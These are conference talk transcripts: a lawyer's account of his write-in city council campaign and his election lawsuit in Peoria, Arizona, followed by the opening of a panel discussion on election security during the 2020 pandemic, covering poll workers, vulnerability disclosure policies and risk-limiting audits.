Greetings. It's great to be here even though I'm not there and we're not in Vegas. Well, maybe you are, but I'm not. And after years of pilgrimage to Vegas and DEF CON and other security conferences, primarily to speak about, well, privacy and security and inevitably Bitcoin, I never imagined that I would be doing this virtually, especially not for the voting village rather than the crypto and privacy villages where I normally hang out. But with that said, I have spent significant time in the voting village, and I've even included a couple photos in this presentation to help bring us back to our in-person DEF CON days, which we will surely return to. But for now, our virtual con is our reality. So I hope this presentation helps to educate you and brighten your summer in safe mode. Please find me on Twitter if you have any questions. I'm at Cordero underscore ESQ. And with all that out of the way, let's get into it. A lawyer's reflections on elections. Let's get into it. So who is Cordero? That's me, the lawyer speaking now, providing reflections to those that will listen. And without reiterating my entire biography, I want to quickly go through a couple of these points. I'm a partner at Sublime Law, which focuses on business and intellectual property. I lead our emerging technologies practice group. And before joining Sublime Law, I worked at a forensics and cybersecurity professional services firm in Silicon Valley, as well as a large US law firm, where I focused on privacy. I graduated ASU law with honors, focusing on law, science and technology. And I worked at ASU's innovation advancement program. But most relevant for today, I'm a former political candidate that has a story to tell that is part of a larger and more important narrative than any single election race or election case. So what will we not be going over today? What's not on the agenda? I will not be making a political statement in support of any party.
I won't be re-litigating any lawsuit or critiquing any judicial officer. So with that out of the way, let's get into the agenda of reflections. First, I'm going to explain the structure of the American government, including state and federal similarities. Second, I'm going to introduce how my lawsuit came to be, the origins of the campaign and the lawsuit that followed. Three, I'm going to highlight issues and share the oddities of election law that I learned along the way. And fourth, I'm going to share some information and some resources for your reference. And finally, as you can see on the bottom, the overall objective here is to educate and broaden the community of people that can become experts in how the system works so they can help improve it over time. Getting into it, democracy now. You may already know that the US federal system has three branches of government. And to keep things simple and to appeal to DEF CON's global audience, this slide represents how the US Constitution, through its different articles, structures the federal government. This system of co-equal branches of government is meant to accomplish an appropriate balance of powers, thereby achieving a level of accountability and independence that is good for governments. You can think of these branches of government as the rule makers, rule enforcers, and rule interpreters. But there's more to the US than the federal national government. There are state and local governments. The states follow a similar structure of government, using a state constitution and establishing co-equal branches of government. But what is more important to understand is that these local state governments are typically much more impactful than the federal government in terms of your everyday life. So how do the national and state local governments share power? Let's take a look. Wow. This one might make your eyes glaze over, but stay with me. 
We know from before that it is the constitutions that inform us as to the sharing of powers between the federal and state local government. For instance, as you can see on the bottom of this slide, the 10th amendment of the US Constitution declares, as we'll discuss more later, the, and I quote, the powers not delegated to the United States by the Constitution, nor prohibited by it to the states, are reserved to the states respectively, or to the people. That's a mouthful and a very old sentence. We're talking 1776, right? So what does that mean? In other words, states have all powers not granted to the federal government under the Constitution. So conveniently, this slide gives some examples of the sharing of powers via exclusive and concurrent powers and what should really be a Venn diagram. But let's just focus on this slide from left to right. The exclusive federal powers are things like coining money and declaring war, conducting foreign affairs. In the middle, we've got concurrent and shared powers, and those are things like taxation and establishing courts. And finally on the right, we have exclusive state powers like conducting elections. And that's a little bit of a gray area because the federal government does have some administration aspects related to elections. And I wouldn't really call it a completely exclusive state power. But the states do control the elections and how they proceed. There's also providing for public safety, health, and welfare. But the point of showing this slide is to demonstrate that state and local governments have much more power to influence communities than is often expected by its citizens. So let's explore some of those local powers some more. The impact lies locally. Just take a minute to take in the amount of powers and responsibility that is delegated to local authorities. 
We have budgeting, prioritizing, human resource functions, program management, taxation, ordinances and resolutions, charter and constitutional amendments, zoning and land use and eminent domain, regulating public health and safety as we previously discussed, and liaising with other governments. But for today, we want to focus on elections. So now that we've briefly examined some of the structural foundations of the American government, we have arrived at our next point on this journey of learning. And that is the second point in the agenda: stories from my own campaign and related lawsuit while seeking a seat on the local city council of the city of Peoria, Arizona, not Peoria, Illinois, for all the Midwesterners listening. Shout out to SecKC, by the way. So why run? Well, I hope that the previous slides have established, at least in part, that running for local office can provide a great platform to bring positive influence to your community. And specifically on this slide is my answer, in quotes, to this question of why run that I gave to the local newspaper, the Peoria Times. I talked about my campaign platform: community safety, more engagement, and better protection of people's opportunities and legal rights. I also talked about my qualifications as a lawyer and my connection to the community. But what isn't on this slide or in the newspaper is clarification of what kind of candidate I was and how that impacted my chances of winning. And I don't mean what kind of candidate I was in terms of person or party affiliation, but from a procedural perspective. That is to say, I was a write-in candidate. To understand write-in candidates, think of Kanye West. He would most likely be considered a write-in candidate for the 2020 presidential election, but he would not be considered an official write-in candidate because he probably has not filed the necessary paperwork.
Just as individuals often write in candidates like Jesus or Mickey Mouse, these candidates are not official. They cannot serve even if they get the requisite number of votes. This is because they haven't complied with the other rules and regulations or filed the paperwork that might be necessary. So I was an official write-in, meaning that votes for me would count and meaning that I filled out the extra necessary paperwork. But why was I a write-in? It's an unusual election that I took part in. And it also coincided with an unusual and unfortunate time in my own life, but I nonetheless found it important to carry on, as you'll see in the next slide. Despite the fact that most write-in candidates lose their elections, why continue? Well, as was noted by my alma mater here on the right side of the slide, I felt compelled. But more importantly, why I felt compelled was because of my care for the community and to carry on what others before me had started. For instance, Carlo "Rocky" Leon, who became a sort of mentor to myself and my sibling, had received honors from the National League of Cities and earned the respect of his constituents in my city for over 20 years. I wanted to carry that legacy forward. And I would get that opportunity to try in 2018, or rather 2019. But let's first start with 2018. Background to the 2018 race, which I did not take part in. As I mentioned, someone I looked up to, Rocky, who was the Pine District Councilman for so long, actually won the 2018 race, which I did not partake in. But unfortunately, a few months into it, Rocky's term was cut short, and due to health reasons, he was forced to resign. So this brings us to the background of the 2019 special election race. You can see there are two ballot candidates, Danette on the left and Randall on the right. And there's me, the write-in candidate, in the middle. This story gets a bit more complex. During the election, Rains drops out for health reasons.
And it is reported that he said about his medically forced withdrawal that having a very qualified write-in candidate makes his decision a little easier; this will allow the voters to have a choice in this election. Hopeful for voter choice, you can see Rains' quote there on the left and on the right. And perhaps Mr. Rains knew something that I didn't at that time. In fact, it's interesting to note that Mr. Rains was passed over by the sitting Peoria council, who made Danette Dunn the interim council member, seemingly favoring Dunn after publicly backing her at events in the 2018 race that she lost. Thus, it's very possible that Mr. Rains may have already been aware of something afoot. But what was it? And this brings us to the controversy. It might not have been what Mr. Rains was thinking about, but he was concerned with the city providing choice to its constituents. And I'd like to begin talking about this lawsuit by reading the introductory paragraph of our complaint, because this gives the high-level story of the lawsuit from my perspective. Though other lawyers may simply call it hyperbole, the ones listening in on the voting village probably will not. I quote: most election experts across the United States of America agree that our election processes are vulnerable in a variety of ways. These are not limited to attacks on elections from outsiders. In fact, this statement of contest concerns an unscrupulous internal attack and misinformation campaign that led to an election result that is believed to be illegitimate. Indeed, a democratic state necessitates that its citizens are adequately informed by the state or, at a minimum, are not misled or misinformed by the state about election matters. So what really happened? You can see something there on the right about a postcard, and we'll definitely get to that. But the allegations against the city are many and should be viewed as cumulative.
The allegations range from enforcing inaccurate and outdated sign regulations against my campaign, withholding voter data, improperly removing my campaign signs, and citing my campaign volunteers for irrelevant code violations. However, one of the primary controversies as it relates to this special election in 2019 is about a postcard. And specifically, the city overstepped its responsibility and improperly did so, not in accordance with the letter of the law, by sending out a postcard under the pretext of an update when that update clearly helped the city's preferred candidate over all others. Essentially, the city of Peoria, despite having an agreement with the Secretary of State to handle the election procedures, took it upon itself to release a postcard not in line with the letter of the law on or around the day that the ballots arrived. As you can see on the right side of the slide, the postcard, which the court ultimately confirmed was sent to voters not in accordance with the letter of the law, appeared to many voters to be confusing and to be an endorsement of the other candidate. For the record, this was an all-mail-in election. And what's extra notable is that in order to win in the primary, you must win by a certain percentage: 50% plus one. And this is important because if there isn't a conclusive winner, then the general election would need to happen and all candidates would be on the ballot, including the write-in candidate, myself. So in that context, the content of the postcard becomes very clear in its motives, especially its timing. The postcard contained a message that wasn't meant to simply inform of all candidates; in fact, it didn't inform of all candidates. It was meant to partially inform of candidate updates and ultimately discourage wasted votes on one candidate in exchange for the other known candidate on the ballot. Let's take a closer look. As you can see here, on the left is the law.
This is a part of our complaint, and on the right are the instructions that the Secretary of State, not the city of Peoria, provided. And you can see the law, A.R.S. 16-343(G), which is excerpted on the left side of the slide in our complaint, requires that notice of withdrawn candidates shall be made available by providing with the early ballot instructions, those are the things on the right, a website address for information regarding withdrawn and write-in candidates. So on the right side, look what was provided by the Secretary of State. It's circled right there: a website address for updates about candidates. This follows the law, but this wasn't all that was done. This is all that should have been done, but let's look at the next slide to see what the city actually did in terms of notice to its voters, which we already know was in addition to what the state election law provides right here on this slide. So the postcard is on the right, and the details are clearly more than what is required. It states how Mr. Rains is no longer a candidate and that votes toward him will not count. Don't waste your vote on him; he's out of the race. So the implication here is that if you want your vote to count, you vote for the single person on the ballot, Danette Dunn, or you simply abstain from voting for lack of awareness of another candidate. Notably, write-in candidates have the biggest challenge of marketing, of letting people know that you're out there, you're in the race, and you want to represent their interests. And to have this postcard come out and simply provide what seems to be a partial update, not in accordance with the letter of the law: from my vantage point, this is a clear violation of law. It's not just outside the letter; it's a violation. And the court agreed insofar as the city was not following the letter of the law, but as you'll see, that didn't matter much in the end. So what did I request as a remedy anyway?
I wanted the result set aside. I wanted the general election organized as scheduled, the primary declared inconclusive, and to get on the ballot of any new election. And crucially, I wanted to stop officials from exerting improper influence or engaging in misconduct. But what's really important to understand is that I did not want to file this lawsuit against my hometown. This was a painful experience, one that was awkward. And ultimately, just as I felt compelled to run as a write-in candidate, I felt compelled to file this lawsuit for my community and the hundreds of individuals that wrote my name on the ballot (correctly, I might add, which is a feat). Because I saw something that I thought was wrong, that I thought was a violation, I wanted to have a judge take a look at it and make a determination for the betterment of our election system. But that's not exactly how the press covered the story, and it's not how the city viewed the lawsuit either. So, as you might expect, the city of Peoria maintained that they did nothing wrong. The city of Peoria and interim council member Dunn sought dismissal of the action. The city went as far as claiming that the court didn't have jurisdiction over the city due to a perceived lack of service of process. I'm not going to go into why I don't agree with those arguments, but I will go into some of the procedure, and this is for all the legal nerds out there. The case was set for a hearing on a motion to dismiss, but we ultimately received an expedited hearing on the merits after informing the judge, through another emergency filing, that the case was an election contest and that we were entitled to an evidentiary hearing on the merits of the case within 10 days, according to Arizona law. The judge agreed and we were eventually offered an evidentiary hearing.
But we were ultimately not successful, despite our belief that there were multiple violations of law, and despite the city admitting in court to applying inaccurate election-related regulations against my campaign. Moreover, the press was not particularly kind, making the lawsuit appear frivolous and a waste of resources, so much so that I was getting additional hate mail, something you just get used to as a politician, or a would-be politician, I guess. Also, what's critical is that the judge did not believe the lawsuit was frivolous and did not order me to pay the city's or Dunn's attorneys' fees. I guess that's a small win. So, before discussing lessons learned, I want to turn to Montesquieu's The Spirit of the Laws, because it is relevant to how I feel in this instance: well, they followed the spirit of the law, not the letter. But it's also relevant because it was required reading for our founding fathers. Montesquieu writes, in reference to a brutal state without much procedural due process in its legal system, and I quote: for one to have the passions of pleaders would be quite dangerous; those passions presuppose an ardent desire to see justice done, a hatred, an active spirit, and a steadfastness in pursuit of justice. To me, this quote stands out because I believe I was perceived as a threat, a political one. And upon making my pleadings known in court, I was considered even more so, despite that in my heart, spirit and actions I was simply seeking justice for the people. Maybe that is exactly why. But just as the local paper's quotes of mine on this slide demonstrate, despite disagreeing with the decision, I decided to move on and not appeal, for practical reasons like money, time and futility. Or perhaps, again in the words of Montesquieu, each man should know that the magistrate must not hear of him, and that he owes his safety only to his nothingness. So no appeal.
Alas, all said and done, I consider this lawsuit a small victory towards ensuring election integrity, and I hope the lawsuit encourages others to file similar legal actions. It should be noted here that if you're a voter, you probably have legal standing to sue; you don't have to have skin in the game like I did. So if you see or experience suspicious activities or misconduct during an election, say something. Now we can get into the bigger picture and lessons learned. This personal experience, which I wouldn't really wish on anyone, made me dig deeper into our electoral system. From my research and experience, it has become increasingly clear that many human and structural problems exist, including how the branches of government share power related to elections and the jurisprudence around how the courts decide matters of importance concerning election issues. Although I do not bring forward a complete solution, below are some of the primary issues that I believe we need to address as a society to ensure a more secure and fair democracy. We need to implement strong federal standards for protecting voting rights and eliminate pretexts for stacking the deck. The case that really comes to mind is Rucho v. Common Cause, a 2019 Supreme Court case involving North Carolina and Maryland partisan gerrymandering, which is of course the redrawing of district lines to all but politically guarantee seats. And the court ruled against the plaintiffs, finding that partisan advantage is actually permissible as the intent behind districting choices, because this issue is to be left with the legislatures and not decided by the courts. And the turning point for the decision was that there are no discernible legal standards. So they turn to fairness, and they say, as you can see on the slide, fairness is not a judicially manageable standard.
And I just find that to be untrue, because courts sit in fairness and equity all the time. So a decision like this makes a lot of people cringe. And I believe this was a 5-4 decision, meaning it was really close, and that means our Supreme Court justices were not in agreement. So hopefully this case gets revisited along with some other cases. But I don't have time to go into a whole lot of other cases. What I would like to discuss is the pandemic election litigation happening in 2020. As of right now, there are dozens, perhaps by now hundreds, of cases that over the past few months have been ticking up in number. And this really spells trouble. It could either be a good or a bad thing: it means people are fighting inequities, and I guess each dispute will have two sides to it. I just hope that a lot of this pandemic election litigation gets resolved in the proper way, because these cases are dealing with things like how high-risk individuals in a pandemic hot spot accomplish voting safely. This is not something that America should really be struggling with in 2020. It seems beneath us. And I really implore all those that are still listening to speak up about these election fairness issues and voting rights, and to become more knowledgeable on these topics. I'm not the top expert in this field; I'm a privacy and data protection lawyer. This is something I learned almost by accident. And so for all those that aren't on the front lines of the litigation, let's go to the bottom of this slide. I would say get involved in the fight for democracy and more secure elections by getting involved with different organizations. For example, support fighting election disinformation, which is what the Election Integrity Partnership (EIP) is doing. And I love this idea because they are not focused on the candidates or what the candidates are saying.
They're focused on content: not necessarily political content, but content intended to suppress voting, reduce participation, confuse voters as to election processes, or delegitimize election results without evidence. These are certainly big-ticket items and challenges in 2020, especially with November right around the corner and with so much misinformation out there, and not simply, as in my case, where it was alleged that the misinformation was coming from the government. I think that's probably happening throughout the government of the United States, but as it relates to a lot of disinformation, we have to be very wary of things we're seeing online. So do your part in encouraging others to be careful, especially those that might not be as digitally savvy as those listening to this presentation. So I really want to close with some concluding thoughts and not get too hung up on a lot of the other cautionary tales that are out there. And clearly, as I mentioned, there are dozens and dozens of them playing out in the courts right now. So be on the lookout for those things, be aware of them, and speak up against them when you can. To conclude: this story and experience didn't make me lose faith in democracy. It wasn't a negative experience. There were negative aspects of it, that's for sure. There were painful moments, but speaking to constituents that felt like they were misled by the city, and having them ask you to help fix it, that was something, again, I felt compelled to do, and I did it. And we fought the fight, but we lost those battles. I think the war is still raging on. So these are two lost battles: a lost election and a lost litigation. But I did learn a lot. It was a journey of learning. I didn't think I needed it as a lawyer, but I did, and I'm glad I endured this. Some of the lessons that I learned are listed here, so we can read through the slide together.
Democracy is not perfect, right? It's made up of humans, and humans get things wrong. And it's not just institutions, right? It's not just separation of powers and then everything's okay. Hackers know that humans are the persistent vulnerability in securing any information system, so it should make sense to everyone here that humans need to be monitored closely, especially when democracy is at stake. Strengthening voting rights and securing elections will require hard work and advocacy, which usually means money and lawyers, and lots of both, for better or worse. And election litigation, as I've come to find out, is a beast of its own. Remember, I'm a data protection lawyer, not an election lawyer; this happened by accident. And knowing the importance of these election cases and the expedited schedules for resolution makes this fight for democracy very difficult without experts. So if you see something, say something. If you're involved in helping advocate for voter rights and you see something, or you run for local office and you see something that you don't think is right, reach out. Reach out to me. I may not be the person to help you, but reach out to somebody that has more knowledge than you do. I perhaps would have done better in the litigation had I sought out an election lawyer early in the process. That wasn't in the cards for me; I hope it will be for you if you ever find yourself in such a bind. And here's the bonus lesson; you might already know this one. For those of you that get into politics, local or otherwise, or find yourself for whatever reason speaking to the press: do not blindly trust them. Usually they're not interested in telling your story, or sometimes not even the true story. They are often interested in telling their own version of the story for their narrow reader base. And I can't hate them for that; they are making a living. That's their job. But do not trust them blindly.
It will do more damage to you than good; I would bet on that. So thank you so much. I'm happy that I had this opportunity to do this, even if it was virtual. I really appreciate all of you that stuck it out and made it this far. Thank you so much. I appreciate you. If you have questions, please reach out to me. And as you can see here, my own lawyer on this case, Brittany, who is also not an election lawyer, is another Sublime Law attorney. She's here with me, on the left, at the DEF CON 27 Voting Village. And we will return, so if you see us, make sure to say hello. We will definitely stop into the Voting Village and try to gain some additional knowledge as the years go on. So thank you all, and have a great and fantastic rest of your summer.
Join Cordero Alexander Delgadillo, a business and technology lawyer, and more recently a former political candidate, as he demonstrates that elections, especially local elections, are akin to information systems (even reasonably locked down systems), because both are highly susceptible to the very non-tech, human vulnerabilities (nefarious and negligent). In this talk Cordero will provide insight by: - Examining the structures of American Democracy - Telling stories from his own election lawsuit: Delgadillo v. City of Peoria et al - Highlighting election process issues deemed “inconsequential” or “un-addressable” - Sharing information and resources
10.5446/50758 (DOI)
Hi, welcome to Election Security Part Two: The Infrastructure Strikes Back. My name is Amelie Cran, and I will be your panel moderator for this session. Little did we suspect that this set of panelists would be back together six months later to discuss where we are versus where we were when it comes to election security and the upcoming November general election. To say it lightly, things have gone off the rails, given that you now see us by video in our pandemic present. We've had a highly contentious Democratic primary season, some technical glitches supporting such primaries, court cases regarding in-person voting, and enough various disinformation campaigns to last another election. One thing that hasn't changed is the lineup of our esteemed panel from ShmooCon. Tonight we have Kimber Dowsett, Casey John Ellis, Jack Cable and Tod Beardsley, and I will let them introduce themselves with a short intro. Hi, I'm Kimber. I am the director of security engineering at Truss, that's truss.works, a software infrastructure company based out of San Francisco that works with both the public and private sectors. Hi, my name is Casey Ellis. I'm the founder, chairman and CTO of Bugcrowd. We run crowdsourced security-as-a-service programs, including vulnerability disclosure, bug bounties, crowdsourced pentests and so on. And yeah, it's unusual to be talking about this with all the additional context, but very good to be talking about it again. Hi everyone, my name is Jack Cable. I am an election security technical advisor for the US Cybersecurity and Infrastructure Security Agency, which is essentially the nation's risk advisor. We advise states and localities on the risks associated with different technologies and provide cybersecurity assessment services so that they can make the best decisions to have a safe and secure election. Besides my work at CISA, I am a student at Stanford and a security researcher. Cool, and hi, I'm Tod Beardsley.
I'm a director of research at Rapid7, a US-based cybersecurity company. I personally care a lot about elections. I am usually an election judge in Texas, and I have a deep background in hacking, offensive security research, vulnerability analysis, stuff like that. And congrats to Jack for the level-up since our last meeting; he gets a bunch of power-up points on that one. That's awesome. So we're going to break this down into two sections, I believe, unlike last time. First, a catch-up section about what has happened since February, so we have a couple of questions regarding that. And then obviously a section B: we're coming up on about 90 days till the general election, and what can we do between now and then, since the timeline is definitely shorter, but also what kinds of activities are going to be carried forward to the next elections, the next primaries, or just lessons learned in general. So with that, we have ourselves a first question. We find ourselves here again after six months, and there's been a lot going on that we didn't cover back in February. However, regarding one of the last takeaways from closing that panel, we noted it was important to engage your local board of elections. So with that, where do we stand? Wow. Well, let me start this off. I engage with my local board of elections by being an election judge. I ran a polling place not too long ago. We're recording this at the end of July, so for me in this time stream, this was about three weeks ago: there was a special election and a runoff election combined here in Texas. It was pretty fun. I never knew that wiping down polling places would be so rewarding. I got to feel like I was battling COVID every five minutes, helping people out, helping people vote. And for that, at least for me, I felt like I was doing something.
I did notice, through training and then on election day, that the demographics have shifted quite a bit in terms of who is working the polls. It is very common normally to see a lot of retirees and older people who are there to help out their communities in this way. I was not the youngest person at this polling place, which was a first for me. So if you have the opportunity and the inclination, and don't mind doing a whole lot of cleaning all day long, maybe volunteer to work in a polling place come November. Anybody else? Yeah. I mean, in terms of what has happened since then with rocking up and helping out, it's fair to say that any intention to do that would have been a little derailed by March and so on. But I think Tod's example of just doing what's needed, especially with the pandemic and the changes in operational considerations around actually running an election, is still true. It's even more true now, I think, than it was. As the token non-citizen on the talk, this is even more foreign interference now than it was when we gave the talk, because I'm actually in Sydney at the moment. But part of what I and a bunch of other people have been working on is standardization: how do we make adoption of vulnerability disclosure programs, and the implementation of policies, specifically for 2020 with all of the unique considerations this year has, as easy as possible for the states and counties? So we updated a version of the language on disclose.io, which is an open source initiative to basically make it easy and as standardized as possible; that came out after the talk. And it's been good.
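The standardized policy language Casey describes is often paired with a machine-discoverable security.txt file so researchers can find the disclosure channel. As a hedged illustration (the domain, contact address, and policy URL below are made up, not taken from disclose.io or any real county), a minimal file might look like:

```text
# Hypothetical security.txt for a county election office.
# Would be served at https://vote.example-county.gov/.well-known/security.txt
Contact: mailto:security@example-county.gov
Expires: 2020-12-31T23:59:59Z
Policy: https://vote.example-county.gov/vulnerability-disclosure-policy
Preferred-Languages: en
```

The `Policy` line is where the standardized disclosure language itself would live; the file just makes it findable.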
I think at the very least, that's served to get a lot more people thinking about doing that who maybe weren't before, because that blocking function of "how do I even engage with the hacker community in the first place" was, I think, pretty difficult for a lot of people to even consider. Certainly, to echo Casey's point there, something I've been involved with and pushing for is for states and vendors to establish these vulnerability disclosure policies. On the CISA side, we are releasing guidance to election officials on establishing vulnerability disclosure policies, essentially saying: if you want to do this, these are the best practices you can follow. A lot of that is drawn from CISA's Binding Operational Directive 20-01, which is a draft directive that will require all federal agencies to establish a vulnerability disclosure policy. Yeah, that was a big deal, by the way. Yeah, I'm really looking forward to seeing that come out and seeing the positive security effects it can have all across the federal government. But of course, CISA doesn't have that same authority over states, so we're essentially putting out guidance, giving them the best practices and the resources they need to start this themselves if they want to. And then, besides that, just the work I've been doing, clearly not at the local level but the federal level: I think there's really a lot of ability there to have an impact at scale, working with all 50 states, working with a significant portion of the localities and counties out there. So I think that's a really great opportunity, being at CISA and having this kind of wide-ranging effort, wide-ranging effects, that I'm not sure you can have anywhere else in election security. Kimber? Yeah, I'll jump in. It works out well: since Jack touched on Casey's point, I'm going to touch on Tod's point.
But the prompt was, you know, what's happened since February, and the answer is a pandemic. So the reality is that a lot of the election security things that we would normally talk about, and that we will touch on today, still rely on people being able to actually get to the polls to vote in states that aren't going to allow mail-in ballots. I think that will be a nice segue into a lot of the misinformation we're hearing about mail-in ballots. But to Tod's point, we can scream to the skies that mail-in ballots are perfectly safe and reasonable and actually help disenfranchised voters have a voice, but there are going to be some places where folks go to the polls, and somebody has got to be there to staff the polls, or we're going to end up with a different type of disenfranchisement, right, where people are lined up for 20 hours because there are three poll workers for thousands of people who want to vote. So it's important to know what's going on in your voting district, and if your voting district allows mail-in voting, great, cool. But if they don't, that's a perfect opportunity to get involved. And I understand that it's asking you to put yourself at risk, too, and that sucks, right? It is. Yeah. That's where we're at. I had a COVID test about four days after election day, and I am shocked I did not come up positive. But hey, it turns out masks and hand cleaning and surface cleaning work. Yeah, a follow-up on this: obviously the curveball of the year is the pandemic. And as Tod mentioned, a lot of the election workers that were counted on by various precincts and states in general were retirees and those who, I hate to say it, have more time on their hands. This is obviously going to prove a challenge for staffing, and it runs headlong into the issues of some of the disinformation that's been spread about mail-in voting.
Are there any particular ways that we can mitigate or address any of these issues that are novel? Obviously, we're running headlong against people pushing back on mail-in voting, but then we have the reality of folks potentially exposing themselves to a deadly virus. I hate to run the gamut of talking about things like e-voting, but obviously there are other options to look at, like extending voting times or alternating places where people can vote to reduce exposure. Are there any other methods that the EAC and others can pursue in this case? Inb4 blockchain. Yeah, that wasn't the right answer; you have to drink now. I mean, e-voting is a non-starter, right? We're recording this, and today it is 97 days before the election. By the time this airs, it'll be about 90 days before the election. West Virginia is doing their thing, and good for them. No one else is. I don't see anybody having any plans for that right now. Maybe someday in the future e-voting will be a thing, but I think the easiest way to get people to the polls in states that don't have mail-in ballots is extending early voting. That's a thing. Texas, I'm in Texas right now, so, Texas: we're bad at mail-in ballots, but we're apparently really good at early voting. My first day to vote in November will be October 13th. That's a stupendous amount of time, way longer than usual. That will help at least give people an opportunity to get into a polling place when it may be not so crowded. The last day of early voting is super crowded, and election day will be super crowded. If you can vote in that early voting period, I strongly suggest you do. It doesn't help any of the IT problems that we talk about, and that nominally this panel is supposed to be about, but it does help with not getting COVID, which might be a little more important. Kimber? I want to add a plus one to adding more polling places, because we know social distancing is huge to prevent the spread of COVID.
When we have communities like mine, where there's one polling place downtown and then one local school, we have the town basically split in half between these two polling places, and it gets kind of crazy. In assigning people to districts, we see some gerrymandering: they'll draw a line right through the middle of the university so that half the university students think they're supposed to vote at one place when it's really the other. If they're going to say no mail-in ballots, then why not say that all the schools in a single district are polling places, and if you're eligible to vote at one, you can vote at any of them, so that folks can at least get to the closest place and we do our best to disperse the population. But a lot of towns have only a couple of polling places. They're almost always schools, and who knows if schools will even be open, but if they are, you sure don't want 100,000 people rolling through a school that children are going to be at the next day. So there are physical considerations that certainly were not part of our equation back on, what, February 1, when we jammed through all the things we thought could go wrong. This was not on my bingo card. No. No, no. So the thing that to me is new, and I've actually heard Tod say this on a panel before: democracy does rely on the peaceful concession of whoever loses. So with the increased likelihood of a contested count because of mail-in voting, the changes in the process, and different things like that, I think there was a lot of conversation back in January and prior around the role of risk-limiting audits, to basically say that any accusation of fraud can be confirmed or denied at that point. A project to give a shout-out to is Arlo, which is essentially a framework for that, which I believe is funded by CISA and is open source.
And something that I've been trying to encourage people in the security research community to do is to go bang on that, actually go look at it from a security standpoint, because ideally, if at any point over the next six months Arlo itself gets called into question as a tool to rely on, at least at that point we can say: no, we actually went through this and it seems legit. So that, to me, is new. There was always going to be some degree of risk, as there always is, but I think that actually plays a far greater role on election day and post election day in 2020. Yeah, I think they covered a little bit of that in the HBO special with Harri Hursti as well; I think the second half of the documentary was about risk-limiting audits. I don't know if they necessarily had a really good explanation of how it all worked; that is a little extra math for most folks, but it's one of those good things that can be put in place. And, calling myself out, this was a theme the last time we got together as well: de-acronyming stuff. So RLA stands for risk-limiting audit. I think it's Verified Voting who are running point on it, and they've done some, I think, good work on explainer videos that take some fairly complicated math and simplify the concept to the point where a non-technical potential voter can actually consume it and understand what's going on. It's essentially a cryptographically seeded random sample set that's then paired with verification of the outcome compared to what's recorded. And if there's any sort of deviation or margin of error within that sample set, then it goes again and goes again until it can work out the scope of that. Or, if everything checks out, then everything checks out and things are okay at that point.
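The sample-and-escalate loop just described can be sketched as a toy simulation. To be clear, this is an illustrative simplification, not Arlo's actual code or statistics: real RLAs size their samples using risk-limit math rather than the naive doubling used here.

```python
import random

def toy_rla(ballots, reported_winner, seed, initial_sample=100):
    """Toy risk-limiting audit: draw a random sample of paper ballots,
    check that the sample's winner matches the reported winner, and
    escalate the sample size on any deviation, up to a full hand count."""
    rng = random.Random(seed)  # public random seed, e.g. from dice rolls
    n = initial_sample
    while n < len(ballots):
        sample = rng.sample(ballots, n)
        counts = {}
        for choice in sample:
            counts[choice] = counts.get(choice, 0) + 1
        if max(counts, key=counts.get) == reported_winner:
            return True, n            # sample confirms the reported outcome
        n = min(n * 2, len(ballots))  # deviation: escalate the sample size
    # ultimate fallback: a full hand count of every paper ballot
    full = {}
    for choice in ballots:
        full[choice] = full.get(choice, 0) + 1
    return max(full, key=full.get) == reported_winner, len(ballots)
```

The key property, which the toy version shares with the real thing, is that the audit either confirms the reported outcome from a small sample or keeps escalating until it becomes a full hand count, so a wrong reported winner cannot survive the process.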
It's the randomization and the process around it that are, to your point, difficult to explain on a technical level to most people, but I think the concept itself is actually very easy to grok. Great. And just to go back a little to our discussion of the different kinds of voting options that there are: it's clear that the election is going to be run a little differently this year. Given the constraints we face, election officials have to provide an accessible and safe method of voting for their voters. And what this means, essentially from CISA's perspective, is that we want to limit the risk as much as possible with these options. So for instance, talking about online voting, also called electronic ballot return: CISA has assessed that it is high risk even with controls in place; the risk there still cannot be fully mitigated. It's not CISA's job to decide whether these are deployed, but it's our belief that the risk on these is much higher compared to, say, in-person voting or mail-in ballots. So on that end, CISA has put out a series of documents essentially describing, from a procedural sense, what kinds of options election officials have, both to ensure safe in-person voting and also to make sure the mail-in balloting process goes smoothly. And just to touch on some of the in-person voting options there: it is very true, of course, as Tod was saying, that a lot of these poll workers are older and face a high risk of being impacted by the virus. So there are going to be very high poll worker shortages, and in a lot of cases that means consolidation of polling places, because they can't staff that many. That of course can lead to problems, because then you have more people in fewer places, which, with a pandemic, is of course not ideal. But we have to make it work. So one option there is vote centers, for instance: larger physical polling places that make it easier to maintain physical distance.
There's of course still a poll worker shortage. I guess here I'll say, to everyone who is young and healthy: the best thing you can do is serve as a poll worker and make sure that, on a local level, your elections run smoothly. But yes, it is going to be a challenge, just because in-person voting of course carries some risks with it from a health perspective. So we encourage states to make the decisions that best fit them, but both mail-in balloting and in-person voting we view as low-risk options, given that there's a paper trail and you can run risk-limiting audits on them. So I'm going to take a little bit of a left turn. Full transparency for folks who are watching this: we have a list of questions that we've agreed on, but I'm going to rearrange them because of the way the flow is going. One of the things that's amazing about where we live, the United States (Casey excepted, but we'll adopt you for this one), is the freedom of speech that's part of our own constitution. But as we mentioned in February, one of the critical things about this election is how we talk about it, whether through discourse about outcomes, be it the primaries or the general election, or the methodologies we use to vote. So we talk in the press about how things have gone and the process of how we go about voting, but there's also this thing called disinformation or misinformation, where what is said is willfully wrong, essentially not right when fact-checked, or in some cases is disinformation provided by an external entity. We know that in 2016 and earlier, and in the recent midterms, we had influence from outside sources, and obviously the Washington Post just recently covered that we're potentially seeing some influence from China and Iran and some of our other, as we classically qualify them, adversaries, but we still find ways to deal with them.
Where do we kind of find ourselves in this case right now? Obviously, six months later, we had a little bit of a, I would say, necessarily contentious Democratic primary, but it was a lot more graceful when people basically said, yeah, I'm out, and let people carry forward. But also in recent news about how people are talking about the legitimacy of the methods that we're using: where do you kind of see ourselves now, and what can we do in the future here, both as folks who are attendees to this video, but also as responsible citizens, to kind of educate others, your parents, your friends, your peers, your neighbors, and so forth, to be on the lookout for this?

